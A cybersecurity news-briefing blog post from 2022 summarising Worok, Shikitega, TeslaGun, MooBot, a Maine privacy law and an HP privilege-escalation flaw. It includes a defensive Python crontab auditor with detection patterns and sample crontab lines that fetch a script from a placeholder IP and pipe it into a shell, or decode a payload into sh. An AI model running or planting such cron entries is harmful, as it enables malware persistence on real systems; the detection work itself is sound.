Blog entry by Les Bell

by Les Bell - Thursday, 8 September 2022, 6:36 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Cyberespionage Group Worok Targets SE Asia Companies, Governments

A previously-unknown threat group, named Worok by the ESET researchers who discovered and investigated them, has been targeting high-profile companies and governments, mostly in Asia. Analysis of previously-obtained telemetry data suggests the group was active in late 2020 but then went quiet until February 2022; they seem to be engaged in cyberespionage, stealing information rather than deploying ransomware or attempting extortion, and their targets are quite diverse, including a telecom, a bank, a maritime company, a government entity in the Middle East and even a company in southern Africa.

The group gains initial access via the ProxyShell vulnerability, which allows them to install web shells in order to persist in the victim's network. From there, a variety of implants are used. The group's reconnaissance tools include Mimikatz, EarthWorm, ReGeorg and NBTscan, after which a first-stage loader pulls down a .NET loader called PNGLoad, which extracts a steganographically-hidden PowerShell script from a PNG image.

The loaders are all heavily obfuscated, with multiple stages of decryption and unpacking before they execute, and analysis indicates that the Worok group develops its own tools, although it may share some with an earlier APT called TA428.

Passilly, Thibaut, Worok: The big picture, ESET WeLiveSecurity blog, 6 September 2022. Available online at https://www.welivesecurity.com/2022/09/06/worok-big-picture/.

Shikitega Stealth Malware Targets Linux

A new piece of malware, targeting Linux computers, including IoT devices, has been discovered by AT&T Alien Labs and christened 'Shikitega'. What is interesting about this particular malware is the stealthy way it downloads and installs in multiple stages: each stage is quite small, typically only a few hundred bytes, performs some small task, and then downloads and runs the next stage. At the culmination of the process, Shikitega installs a Monero cryptominer, but retains full control of the victim.

Along the way, the malware downloads and uses the Metasploit 'Mettle' meterpreter, and uses multiple cycles of XOR decoding to deobfuscate its final payload shellcode, which uses the execve() syscall to execute (you guessed it) /bin/sh, passing it commands received from its C2 server. To persist in the system, it also downloads five shell scripts, setting four crontab entries - two for the currently logged-in user and two for root. If necessary, it will install crond and start it.
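To make that crontab persistence concrete from the defender's side, here is an added example (not from the AT&T write-up, and not Shikitega's own code) that audits `crontab -l` style listings for a user and for root and flags entries with downloader-style traits. The sample crontab text and the heuristic patterns are constructed for illustration and are not Shikitega indicators.

```python
import re
from dataclasses import dataclass

# Heuristics for cron entries typical of multi-stage downloader persistence:
# fetch-and-pipe into a shell, execution from world-writable directories,
# or inline decoding of a payload. Constructed for this example.
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "downloads and pipes into a shell"),
    (r"(^|\s)(/tmp|/dev/shm|/var/tmp)/", "runs from a world-writable directory"),
    (r"\bbase64\s+(-d|--decode)\b", "decodes an inline payload"),
]

# Schedule is either an @-shortcut (checked first) or five time fields.
CRON_LINE = re.compile(r"^(@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.+)$")

@dataclass
class Finding:
    owner: str
    schedule: str
    command: str
    reasons: list

def audit_crontab(owner: str, crontab_text: str) -> list:
    """Return a Finding for every cron entry that matches at least one heuristic."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        # Skip blanks, comments and VAR=value environment lines.
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        schedule, command = m.groups()
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, command)]
        if reasons:
            findings.append(Finding(owner, schedule, command, reasons))
    return findings

# Constructed sample listings for a user and for root (documentation IP range).
SAMPLE_USER_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /home/alice/bin/backup.sh
*/5 * * * * /tmp/.x/a.sh
@reboot curl -s http://198.51.100.7/b.sh | sh
"""
SAMPLE_ROOT_CRONTAB = """\
0 * * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * /var/tmp/.m/c.sh
@reboot echo Zm9v | base64 -d | sh
"""

def run_audit() -> dict:
    """Audit both crontabs, since the persistence described uses the user's and root's."""
    return {"alice": audit_crontab("alice", SAMPLE_USER_CRONTAB),
            "root": audit_crontab("root", SAMPLE_ROOT_CRONTAB)}
```

On a live host the same function can be fed the output of `crontab -l` and `crontab -l -u root`, plus the files under /etc/cron.d, to spot entries that appeared without a change ticket.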

Caspi, Ofer, Shikitega - New stealthy malware targeting Linux, AT&T blog, 6 September 2022. Available online at https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux.

Control Panel Manages ServHelper Back Doors

The days when hackers used IRC (Internet Relay Chat) as their command and control channel, with simple text commands, are long gone; these days, the bad guys use sophisticated dashboards and control panels to manage their assets (actually, your assets).

The Evil Corp ransomware gang (also known as TA505) has long used a piece of backdoor malware called ServHelper, which it uses to deploy a variety of payloads such as cryptominers and ransomware, mainly against the US finance sector, although other industries and countries are also targeted. As this and similar groups have scaled up their operations, managing multiple campaigns became increasingly difficult, especially when a single phishing campaign can target thousands of victims. Evil Corp's solution to this problem is a sophisticated control panel called 'TeslaGun'.

A single instance of TeslaGun can manage multiple campaigns with different delivery methods and attack data. Generally the payloads require no interaction, but the control panel does allow remote control via RDP and VNC connections, and other software can be dropped on the victims' machines. The C2 servers for the control panel are mainly located in a single data center in Moldova, although they keep changing IP addresses to evade detection.

PTI Team, TA505 Group's TeslaGun In-Depth Analysis, Prodaft, 5 September 2022. Available online at https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis.

Maine Privacy Law Survives Legal Challenge

In 202, the US state of Maine introduced one of the tightest privacy laws in the US for internet service providers, in the form of an 'opt in' web privacy standard. This stops ISPs from using, disclosing, selling or providing access to customers' personal information without permission.

Almost immediately, industry associations sued, claiming that the new law violated their First Amendment rights. A federal judge rejected this argument, but industry groups hired a veritable "army of industry lawyers" to challenge the law. However, the groups have now dropped their suit and agreed to pay the state's costs of $US55,000 (which seem quite low, to this writer).

Whittle, Patrick, Internet service providers drop challenge of privacy law, AP News, 6 September 2022. Available online at https://apnews.com/article/technology-lawsuits-united-states-maine-data-privacy-9b2a40a18839c16df732368ee04ea856.

Mirai Variant Targets D-Link Routers

While D-Link products are rarely used in the enterprise, they are popular with home users, and the trend to hybrid work and telecommuting means that compromised devices belonging to employees can represent an exposure for the employer. Now a derivative of the notorious Mirai botnet, called Moobot, is targeting vulnerable D-Link routers with a combination of old and new exploits.

First discovered by Fortinet in December 2021, Moobot was then targeting Hikvision CCTV cameras to recruit them into its DDoS botnet. However, it has now switched to targeting D-Link devices via a range of RCE vulnerabilities. Although D-Link has released patches for these vulnerabilities, home users are notoriously lax about patching their devices. Although Moobot simply uses the RCE capability to install its DDoS malware, it obviously has the capability to do a lot more, and so enterprise security personnel may have to encourage employees to install the relevant patches.

Zhang, Chao Zhibin, Cecilia Hu and Aveek Das, Mirai Variant MooBot Targeting D-Link Devices, Palo Alto Networks, 6 September 2022. Available online at https://unit42.paloaltonetworks.com/moobot-d-link-devices/.

HP Laptop Utility Hosts CVSS 8.2 Vulnerability

Major supplier Hewlett-Packard has disclosed a serious vulnerability in the HP Support Assistant which is preloaded on its laptops. CVE-2022-38395 is a DLL search path vulnerability in Fusion, which the utility uses to launch its HP Performance Tune-up function. The function runs with admin privileges, so by placing a DLL in the right directory an attacker can escalate privileges.

Users are advised to update to HP Support Assistant version 9.11 or later and Fusion version 1.38.2601.0 or later.

HP Customer Support, Privilege escalation in HP Support Assistant, Knowledge Base article, 6 September 2022. Available online at https://support.hp.com/us-en/document/ish_6788123-6788147-16/hpsbhf03809.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Thursday, 8 September 2022, 6:39 AM ]